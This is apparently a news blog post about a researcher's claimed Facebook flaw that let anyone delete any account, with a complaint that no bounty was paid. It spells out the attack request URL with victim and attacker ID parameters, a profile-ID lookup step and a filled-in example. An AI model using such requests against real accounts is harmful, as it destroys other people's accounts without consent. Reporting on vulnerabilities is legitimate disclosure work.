Security researcher finds Vulnerability in Facebook which could delete any Facebook account but Facebook refuses to pay bounty

Posted by: HNBulletin in Ehraz Ahmed, Facebook Hacking, News, Security Researchers, Vulnerability 12 hours ago 0

A security researcher from INDIA named Ehraz Ahmed claims that he found a vulnerability by which anyone could use that to delete any Facebook account, he sent an email to us about his latest BUG.
Here is the complete process, he used to delete a facebook account:

Vulnerable Link: https://www.facebook.com/ajax/whitehat/delete_test_users.php? fb_dtsg=AQA1E-WE&selected_users[0]=[Victems Profile ID]&__user=[Attackers Profile ID]&__a=1 We can get the profile id by using http://graph.facebook.com/[username] Here [username] indicates the username of your facebook profile! In this Demo we will be using a test profile Name: Rahul Agnikotri https://www.facebook.com/hexgroup ( Victems profile) ( this is my test profile) We can remove any account in Facebook even it is of Mark Zuckerberg or any celebrity Attackers profile id = 1781913563 Victems profile id = 100001831297334 https://www.facebook.com/ajax/whitehat/delete_test_users.php? fb_dtsg=AQA1E-WE&selected_users[0]=100001831297334&__user=1781913563&__a=1

He also uploaded a Video Demonstration of this Vulnerability: